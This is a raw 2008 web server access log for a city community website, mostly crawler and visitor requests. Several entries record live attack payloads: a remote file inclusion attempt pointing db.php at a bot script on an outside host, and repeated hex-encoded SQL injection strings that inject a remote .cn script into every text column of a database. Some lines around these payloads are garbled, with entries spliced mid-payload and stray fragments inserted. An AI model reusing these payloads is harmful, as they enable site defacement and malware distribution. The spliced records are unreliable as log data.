193.138.94.10 - - [28/Aug/2008:06:52:22 -0700] "GET /sampo/flv/071908/8.flv HTTP/1.0" 200 2748879 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
195.60.8.193 - - [28/Aug/2008:06:52:28 -0700] "GET /guestbook6.htm HTTP/1.1" 200 43661 "-" "Pg9pPwgjqgpdahmspppjPPsd9 dlimghnasbas" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:29 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=272&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:35 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=155&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5770 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:38 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=531 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.93.147.155 - - [28/Aug/2008:06:52:38 -0700] "GET /logs/db.php?path_local=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 760 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sancarloscity.org"
200.93.147.155 - - [28/Aug/2008:06:52:38 -0700] "GET /db.php?path_local=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 755 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:41 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:50 -0700] "GET /forum2/index.php?s=52906aaf1af15a54edc932595a024241&showtopic=101&st=0&p=531& HTTP/1.0" 200 9342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:52:52 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=179&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:53:28 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=275&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5777 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:53:29 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=243&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:53:30 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=231&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6029 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:53:52 -0700] "GET /forum2/index.php?showtopic=213&pid=1515&mode=threaded&start= HTTP/1.0" 200 7383 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:53:57 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=195&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5982 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:53:57 -0700] "GET /sampo/flv/071908/9.flv HTTP/1.0" 200 12093593 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:54:00 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=147&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5755 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:54:19 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=187&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5963 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
165.193.254.23 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/thumbnails.php?album=23 HTTP/1.0" 200 16918 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/themes/classic/style.css HTTP/1.0" 200 10890 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/scripts.js HTTP/1.0" 200 2715 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/themes/classic/images/site_logo.png HTTP/1.0" 200 15752 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/images/spacer.gif HTTP/1.0" 200 43 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_12%7E0.jpg HTTP/1.0" 200 2963 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.23 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_13%7E0.jpg HTTP/1.0" 200 4224 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_11%7E0.jpg HTTP/1.0" 200 4207 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_14%7E0.jpg HTTP/1.0" 200 4182 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_10%7E0.jpg HTTP/1.0" 200 3999 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_3%7E1.jpg HTTP/1.0" 200 3284 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_3%7E0.jpg HTTP/1.0" 200 3284 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_4%7E0.jpg HTTP/1.0" 200 4024 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_2%7E0.jpg HTTP/1.0" 200 3507 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_1%7E0.jpg HTTP/1.0" 200 4037 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.23 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_7%7E0.jpg HTTP/1.0" 200 3818 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.25 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/albums/userpics/10001/thumb_5%7E0.jpg HTTP/1.0" 200 4331 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=23" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /favicon.ico HTTP/1.0" 404 731 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
165.193.254.27 - - [28/Aug/2008:06:54:26 -0700] "GET /picgallery/thumbnails.php?album=23 HTTP/1.0" 200 16918 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:54:47 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=223&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6039 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:54:48 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedsuser&rollid=102&fromlist=advertisement&frommethod=showdetails&fromid=102&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=95 HTTP/1.0" 200 5799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:54:54 -0700] "GET /classifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=84&clearoff=1 HTTP/1.0" 200 5503 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:04 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=278&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6017 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:08 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=75&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:09 -0700] "GET /qphotogallery/displayimage.php?pos=-320 HTTP/1.0" 200 21407 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:06:55:14 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:14 -0700] "GET /logs/access_071129.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.111.154.16 - - [28/Aug/2008:06:55:23 -0700] "GET /classifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=21&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&clearoff=1 HTTP/1.1" 200 10681 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:33 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=224&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 6005 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:55:34 -0700] "GET /logs/access_080805.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:06:55:52 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:56:05 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=170&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
114.241.12.184 - - [28/Aug/2008:06:56:29 -0700] "GET /logs/access_080219.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776tickets34746/us1:75.198.114.241.12.184 - - [28/Aug/2008:06:56:43 -0700] "GET /logs/access_080204.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776pumpkinfun/us2:69.246.2374.6.18.251 - - [28/Aug/2008:06:56:48 -0700] "GET /forum2/index.php?showtopic=181&mode=linear HTTP/1.0" 200 7340 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:56:51 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=69&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
114.241.12.184 - - [28/Aug/2008:06:57:02 -0700] "GET /logs/access_080219.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077couponloop/us1:208.11.8.200.63.42.95 - - [28/Aug/2008:06:57:17 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61471 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:57:20 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=107&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:57:22 -0700] "GET /robots.txt HTTP/1.1" 200 44 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:22 -0700] "GET /jodera2/viewforum.php?f=1&sid=528088ec81e97de580df6a7b5e493034 HTTP/1.0" 200 83560 "http://www.sancarloscity.org/viewforum.php?f=1&sid=528088ec81e97de580df6a7b5e493034" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:25 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:26 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:27 -0700] "GET /jodera2/index.php?sid=528088ec81e97de580df6a7b5e493034 HTTP/1.0" 200 54934 "http://www.sancarloscity.org/jodera2/index.php?sid=528088ec81e97de580df6a7b5e493034" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:28 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61570 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:29 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83606 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:31 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:35 -0700] "GET /jodera2/viewforum.php?f=1&sid=191da4caa6ebca21278cfa746c175548 HTTP/1.0" 200 83560 "http://www.sancarloscity.org/viewforum.php?f=1&sid=191da4caa6ebca21278cfa746c175548" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:38 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:57:40 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:43 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:44 -0700] "GET /jodera2/index.php?sid=191da4caa6ebca21278cfa746c175548 HTTP/1.0" 200 54998 "http://www.sancarloscity.org/jodera2/index.php?sid=191da4caa6ebca21278cfa746c175548" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
64.1.215.166 - - [28/Aug/2008:06:57:45 -0700] "GET /jodera2/viewtopic.php?t=555&view=next HTTP/1.0" 200 27208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:49 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 90893 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:57:54 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:58:03 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:58:29 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=199&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:58:40 -0700] "GET /picgallery/thumbnails.php?album=toprated&cat=10 HTTP/1.0" 200 15544 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:58:58 -0700] "GET /logs/access_080227.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:59:04 -0700] "GET /forum2/index.php?showtopic=5&mode=linearplus&view=findpost&p=1355 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:59:06 -0700] "GET /forum2/index.php?showuser=403 HTTP/1.0" 200 4440 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:59:07 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=196&fromfromlist=advertisement_active&fromfrommethod=showhtmllist HTTP/1.0" 200 5991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:59:10 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=stats HTTP/1.1" 200 2470 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:59:10 -0700] "GET /forum2/index.php?s=daf31076b4aef5d068e4408738b334dd&showtopic=5&st=0&p=1355& HTTP/1.0" 200 8321 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.142.220.119 - - [28/Aug/2008:06:59:14 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 3246014 "http://search.yahoo.com/search;_ylt=A0geu5W.rbZIOj0A86dXNyoA?p=04+25201-1&y=Search&fr=att-portal&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.sancarloscity.org"
